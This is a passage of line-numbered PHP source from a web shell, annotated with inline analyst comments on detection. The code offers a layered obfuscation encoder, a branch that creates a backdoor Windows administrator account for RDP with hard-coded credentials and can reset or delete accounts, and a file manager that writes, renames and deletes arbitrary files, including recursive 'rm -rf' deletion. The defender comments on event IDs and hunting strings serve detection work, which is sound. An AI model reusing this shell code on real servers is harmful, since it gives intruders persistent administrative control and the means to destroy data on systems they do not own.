  2915. break;case 'super' : $codi=base64_encode(str_rot13(gzdeflate(base64_encode(str_rot13(gzdeflate(str_rot13($text)))))));
  2916. break;case 'urlencode' : $codi=rawurlencode($text);
  2917. break;case 'ur' : $codi=convert_uuencode($text);
  2918. break;case 'json' : $codi=json_encode(utf8_encode($text));
  2919. break;case 'str2' : $codi=base64_encode(str_rot13($text));
  2920. break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
  2921. break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
  2922. break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
  2923. break;case 'gzpress' : $codi=base64_encode(gzcompress($text));
  2924. break;default:break;}}
  2925. $submit = $_POST['submits'];
  2926. if (isset($submit)){
  2927. $op = $_POST["ope"];
  2928. switch ($op) {case 'base64': $codi=base64_decode($text);
  2929. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  2930. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
  2931. break;case 'coeg' : $codi=gzinflate(base64_decode($text));
  2932. break;case 'base6416x' : $codi=base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(($text)))))))))))))))));
  2933. break;case 'super' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(gzinflate(str_rot13(base64_decode($text)))))));
  2934. break;case 'urlencode' : $codi=rawurldecode($text);
  2935. break;case 'ur' : $codi=convert_uudecode($text);
  2936. break;case 'json' : $codi=utf8_decode(json_decode($text));
  2937. break;case 'str2' : $codi=str_rot13(base64_decode($text));
  2938. break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
  2939. break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
  2940. break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
  2941. break;case 'gzpress' : $codi=gzuncompress(base64_decode($text));
  2942. break;default:break;}}
  2943. $myfile = fopen("x.txt", "w") or die("Unable to open file!");
  2944. fwrite($myfile, $codi);
  2945. fclose($myfile);
  2946. echo "<center><div id='kotakan'><br>
  2947. <a href='x.txt' target='blank_'>[ R E S U L T ]</a></div><br>";
  2948. } elseif($_GET['do'] == 'about') {
  2949.         echo '<center><font size="6"color=red>----------------------------------- </font</center>';
  2950.     echo '<center><font size="6"color=red>fucking crazy , have nothing to lose </font</center>';
  2951.      echo'<center><img src="https://image.ibb.co/nCYvNU/862d704401eb3f0252f9f477c381a0d8.png" width="180" height="180" title="Fuck You" align="middle" alt="Fuck You" align="middle" /> </center>';
  2952.  
  2953. } elseif($_GET['do'] == 'contact') {
  2954.     echo "<center><br><font size='6'>--=[ Contact Me ]=--</font><br><br>
  2955.     <table><td style='background-color: transparent;text-align:center;border: 2px lime dotted;width:300px;height:250px;'>
  2956.     <font color='pink'>Email : ameer7awwad@gmail.com <br>Facebook : <a href='https://www.facebook.com/6xxxx' target='_blank'>@6xxxx</a>   <br>Twitter : <a href=https://twitter.com/ameer7awwad>@ameer7awwad</a></font><br></tr></td></table></center>";
  2957.  
  2958. } elseif($_GET['do'] == 'krdp_shell') {
            // Analyst note: on Windows hosts (PHP_OS starts with 'win') this branch drives `net user` and
            // `net localgroup` through exe() (defined outside this excerpt) to create a local account, add
            // it to the local administrators group under three localized names, and to check, reset the
            // password of, or delete an account.
            // Defender view: net.exe / net1.exe spawned by the web server worker or PHP process is a strong
            // signal. In the Windows Security log, account creation is event 4720, addition to a local
            // group 4732, a password reset 4724 and account deletion 4726. The default username and
            // password in the form at the end of this branch are usable as hunting strings. A web server
            // service account without rights to manage local users makes these commands fail.
  2959.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  2960.         if($_POST['create']) {
                    // htmlspecialchars() is an HTML encoder, not a shell or regex escaper: $user and $pass
                    // still reach the command line and the preg_match() pattern unsanitised.
  2961.             $user = htmlspecialchars($_POST['user']);
  2962.             $pass = htmlspecialchars($_POST['pass']);
  2963.             if(preg_match("/$user/", exe("net user"))) {
  2964.                 echo "[INFO] -> <font color=red>user <font color=white>$user</font> already available</font>";
  2965.             } else {
  2966.                 $add_user   = exe("net user $user $pass /add");
  2967.                 $add_groups1 = exe("net localgroup Administrators $user /add");
  2968.                 $add_groups2 = exe("net localgroup Administrator $user /add");
  2969.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
                        // $ip is not assigned in this excerpt; it is echoed together with the credentials.
  2970.                 echo "[ RDP ACCOUNT INFO ]<br>
  2971.                 ------------------------------<br>
  2972.                 IP: <font color=white>".$ip."</font><br>
  2973.                 Username: <font color=white>$user</font><br>
  2974.                 Password: <font color=white>$pass</font><br>
  2975.                 ------------------------------<br><br>
  2976.                 [ STATUS ]<br>
  2977.                 ------------------------------<br>
  2978.                 ";
  2979.                 if($add_user) {
  2980.                     echo "[add user] -> <font color='white'>Succeed</font><br>";
  2981.                 } else {
  2982.                     echo "[add user] -> <font color='red'>Failed</font><br>";
  2983.                 }
  2984.                 if($add_groups1) {
  2985.                     echo "[add localgroup Administrators] -> <font color='white'>Succeed</font><br>";
  2986.                 } elseif($add_groups2) {
  2987.                     echo "[add localgroup Administrator] -> <font color='white'>Succeed</font><br>";
  2988.                 } elseif($add_groups3) {
  2989.                     echo "[add localgroup Administrateur] -> <font color='white'>Succeed</font><br>";
  2990.                 } else {
  2991.                     echo "[add localgroup] -> <font color='red'>Failed</font><br>";
  2992.                 }
  2993.                 echo "------------------------------<br>";
  2994.             }
  2995.         } elseif($_POST['s_opsi']) {
                    // Option dispatch on $_POST['opsi']: '1' checks an account, '2' resets its password to a
                    // hard-coded string, '3' deletes it.
  2996.             $user = htmlspecialchars($_POST['r_user']);
  2997.             if($_POST['opsi'] == '1') {
  2998.                 $cek = exe("net user $user");
  2999.                 echo "Checking username <font color=white>$user</font> ....... ";
  3000.                 if(preg_match("/$user/", $cek)) {
  3001.                     echo "[ <font color=white>already available</font> ]<br>
  3002.                     ------------------------------<br><br>
  3003.                     <pre>$cek</pre>";
  3004.                 } else {
  3005.                     echo "[ <font color=red>not available</font> ]";
  3006.                 }
  3007.             } elseif($_POST['opsi'] == '2') {
  3008.                 $cek = exe("net user $user Ameer_Awwad & MHM");
  3009.                 if(preg_match("/$user/", exe("net user"))) {
  3010.                     echo "[change password: <font color=red>Ameer_Awwad & MHM </font>] -> ";
  3011.                     if($cek) {
  3012.                         echo "<font color=white>Succeed</font>";
  3013.                     } else {
  3014.                         echo "<font color=red>Failed</font>";
  3015.                     }
  3016.                 } else {
  3017.                     echo "[INFO] -> <font color=red>user <font color=white>$user</font> not available</font>";
  3018.                 }
  3019.             } elseif($_POST['opsi'] == '3') {
  3020.                 $cek = exe("net user $user /DELETE");
  3021.                 if(preg_match("/$user/", exe("net user"))) {
  3022.                     echo "[remove user: <font color=white>$user</font>] -> ";
  3023.                     if($cek) {
  3024.                         echo "<font color=white>Succeed</font>";
  3025.                     } else {
  3026.                         echo "<font color=red>Failed</font>";
  3027.                     }
  3028.                 } else {
  3029.                     echo "[INFO] -> <font color=red>user <font color=white>$user</font> not available</font>";
  3030.                 }
  3031.             } else {
  3032.                 //
  3033.             }
  3034.         } else {
  3035.             echo "-- Create RDP --<br>
  3036.             <form method='post'>
  3037.             <input type='text' name='user' placeholder='username' value='Ameer_Awwad & MHM' required>
  3038.             <input type='text' name='pass' placeholder='password' value='MYSteam2018' required>
  3039.             <input type='submit' name='create' value='>>'>
  3040.             </form>
  3041.             -- Option --<br>
  3042.             <form method='post'>
  3043.             <input type='text' name='r_user' placeholder='username' required>
  3044.             <select name='opsi'>
  3045.             <option value='1'>Check Username</option>
  3046.             <option value='2'>Change Password</option>
  3047.             <option value='3'>Delete Username</option>
  3048.             </select>
  3049.             <input type='submit' name='s_opsi' value='>>'>
  3050.             </form>
  3051.             ";
  3052.         }
  3053.     } else {
  3054.         echo "<font color=red> This feature can only be used in Windows Server.</font>";
  3055.     }
  3056. } elseif($_GET['act'] == 'newfile') {
            // Analyst note: the 'act' branches from here to 'delete' form the file manager: newfile,
            // newfolder, rename_dir, delete_dir, view, edit, rename, delete. Paths come from $_GET['file'],
            // the POSTed names and $dir (assigned outside this excerpt); nothing confines them to a base
            // directory, so every operation runs wherever the web server account has access.
            // Defender view: access-log entries with query strings such as act=edit&dir=...&file=...
            // against a script that is not part of the application are a reliable hunting pattern (GET
            // parameters are logged even when POST bodies are not). File-integrity monitoring on the web
            // root catches the resulting writes, and application directories that the web server account
            // cannot write to blunt most of these branches.
  3057.     if($_POST['new_save_file']) {
  3058.         $newfile = htmlspecialchars($_POST['newfile']);
  3059.         $fopen = fopen($newfile, "a+");
  3060.         if($fopen) {
  3061.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  3062.         } else {
  3063.             $act = "<font color=red>permission denied</font>";
  3064.         }
  3065.     }
  3066.     echo $act;
  3067.     echo "<form method='post'>
  3068.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  3069.     <input type='submit' name='new_save_file' value='Submit'>
  3070.     </form>";
  3071. } elseif($_GET['act'] == 'newfolder') {
  3072.     if($_POST['new_save_folder']) {
  3073.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  3074.         if(!mkdir($new_folder)) {
  3075.             $act = "<font color=red>permission denied</font>";
  3076.         } else {
  3077.             $act = "<script>window.location='?dir=".$dir."';</script>";
  3078.         }
  3079.     }
  3080.     echo $act;
  3081.     echo "<form method='post'>
  3082.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  3083.     <input type='submit' name='new_save_folder' value='Submit'>
  3084.     </form>";
  3085. } elseif($_GET['act'] == 'rename_dir') {
  3086.     if($_POST['dir_rename']) {
  3087.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  3088.         if($dir_rename) {
  3089.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  3090.         } else {
  3091.             $act = "<font color=red>permission denied</font>";
  3092.         }
  3093.     echo "".$act."<br>";
  3094.     }
  3095.     echo "<form method='post'>
  3096.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  3097.     <input type='submit' name='dir_rename' value='rename'>
  3098.     </form>";
  3099. } elseif($_GET['act'] == 'delete_dir') {
            // delete_dir: besides rmdir(), $dir is interpolated into `rm -rf` and `rmdir /s /q` command
            // strings passed to exe(), with errors suppressed by @. A shell spawned by the web server
            // process with a recursive delete on its command line is the process-level indicator.
  3100.     if(is_dir($dir)) {
  3101.         if(is_writable($dir)) {
  3102.             @rmdir($dir);
  3103.             @exe("rm -rf $dir");
  3104.             @exe("rmdir /s /q $dir");
  3105.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  3106.         } else {
  3107.             $act = "<font color=red>could not remove ".basename($dir)."</font>";
  3108.         }
  3109.     }
  3110.     echo $act;
  3111. } elseif($_GET['act'] == 'view') {
            // view: file contents are HTML-encoded for display, but $_GET['file'] and $dir are echoed into
            // the action links without encoding.
  3112.     echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  3113.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  3114. } elseif($_GET['act'] == 'edit') {
            // edit: file_put_contents() writes the POSTed 'src' to the path in $_GET['file'], i.e. an
            // arbitrary file write with the web server account's permissions.
  3115.     if($_POST['save']) {
  3116.         $save = file_put_contents($_GET['file'], $_POST['src']);
  3117.         if($save) {
  3118.             $act = "<font color=white>Saved!</font>";
  3119.         } else {
  3120.             $act = "<font color=red>permission denied</font>";
  3121.         }
  3122.     echo "".$act."<br>";
  3123.     }
  3124.     echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  3125.     echo "<form method='post'>
  3126.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  3127.     <input type='submit' value='Save' name='save' style='width: 500px;'>
  3128.     </form>";
  3129. } elseif($_GET['act'] == 'rename') {
  3130.     if($_POST['do_rename']) {
  3131.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  3132.         if($rename) {
  3133.             $act = "<script>window.location='?dir=".$dir."';</script>";
  3134.         } else {
  3135.             $act = "<font color=red>permission denied</font>";
  3136.         }
  3137.     echo "".$act."<br>";
  3138.     }
  3139.     echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  3140.     echo "<form method='post'>
  3141.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  3142.     <input type='submit' name='do_rename' value='rename'>
  3143.     </form>";
  3144. } elseif($_GET['act'] == 'delete') {
            // delete: unlink() runs directly on $_GET['file'] from a GET request, with no confirmation step.
  3145.     $delete = unlink($_GET['file']);
  3146.     if($delete) {
  3147.         $act = "<script>window.location='?dir=".$dir."';</script>";
  3148.     } else {
  3149.         $act = "<font color=red>permission denied</font>";
  3150.     }
  3151.     echo $act;
  3152. } else {
  3153.     if(is_dir($dir) === true) {
  3154.         if(!is_readable($dir)) {
  3155.             echo "<font color=red>can't open directory. ( not readable )</font>";
  3156.         } else {
  3157.             echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  3158.             <tr>
  3159.             <th class="th_home"><center>Name</center></th>
  3160.             <th class="th_home"><center>Type</center></th>
  3161.             <th class="th_home"><center>Size</center></th>
  3162.             <th class="th_home"><center>Last Modified</center></th>
  3163.             <th class="th_home"><center>Owner/Group</center></th>
  3164.             <th class="th_home"><center>Permission</center></th>
  3165.             <th class="th_home"><center>Action</center></th>
  3166.             </tr>';
  3167.             $scandir = scandir($dir);
  3168.             foreach($scandir as $dirx) {
  3169.                 $dtype = filetype("$dir/$dirx");
  3170.                 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  3171.                 if(function_exists('posix_getpwuid')) {
  3172.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  3173.                     $downer = $downer['name'];
  3174.                 } else {
  3175.                     //$downer = $uid;
  3176.                     $downer = fileowner("$dir/$dirx");
  3177.                 }
  3178.                 if(function_exists('posix_getgrgid')) {
  3179.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  3180.                     $dgrp = $dgrp['name'];
  3181.                 } else {
  3182.                     $dgrp = filegroup("$dir/$dirx");
  3183.                 }
  3184.                 if(!is_dir("$dir/$dirx")) continue;
  3185.                 if($dirx === '..') {
  3186.                     $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  3187.                 } elseif($dirx === '.') {
  3188.                     $href = "<a href='?dir=$dir'>$dirx</a>";
  3189.                 } else {
  3190.                     $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  3191.                 }
  3192.                 if($dirx === '.' || $dirx === '..') {
  3193.                     $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  3194.                     } else {
  3195.                     $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  3196.                 }
  3197.                 echo "<tr>";
  3198.                 echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  3199.                 echo "<td class='td_home'><center>$dtype</center></td>";
  3200.                 echo "<td class='td_home'><center>-</center></th></td>";
  3201.                 echo "<td class='td_home'><center>$dtime</center></td>";
  3202.                 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  3203.                 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  3204.                 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  3205.                 echo "</tr>";
  3206.             }
  3207.         }
  3208.     } else {
  3209.         echo "<font color=red>can't open directory.</font>";
  3210.     }
  3211.         foreach($scandir as $file) {
  3212.             $ftype = filetype("$dir/$file");
  3213.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  3214.             $size = filesize("$dir/$file")/1024;
  3215.             $size = round($size,3);
  3216.             if(function_exists('posix_getpwuid')) {
  3217.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  3218.                 $fowner = $fowner['name'];
  3219.             } else {
  3220.                 //$downer = $uid;
  3221.                 $fowner = fileowner("$dir/$file");
  3222.             }
  3223.             if(function_exists('posix_getgrgid')) {
  3224.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  3225.                 $fgrp = $fgrp['name'];
  3226.             } else {
  3227.                 $fgrp = filegroup("$dir/$file");
  3228.             }
  3229.             if($size > 1024) {
  3230.                 $size = round($size/1024,2). 'MB';
  3231.             } else {
  3232.                 $size = $size. 'KB';
  3233.             }
  3234.             if(!is_file("$dir/$file")) continue;
  3235.             echo "<tr>";
  3236.             echo "<td class='td_home'><img src='data:image/png;base64,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'><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  3237.             echo "<td class='td_home'><center>$ftype</center></td>";
  3238.             echo "<td class='td_home'><center>$size</center></td>";
  3239.             echo "<td class='td_home'><center>$ftime</center></td>";
  3240.             echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  3241.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  3242.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  3243.             echo "</tr>";
  3244.         }
  3245.         echo "</table>";
  3246.         if(!is_readable($dir)) {
  3247.             //
  3248.         } else {
  3249.             echo "<hr>";
  3250.         }
  3251.     echo "<center>Recoded ".date("Y")." - <a href='https://www.facebook.com/6xxxx' target='_blank'><font color=white>By Ameer Awwad</font></a></center>";
  3252. }
  3253. ?>
  3254. </html>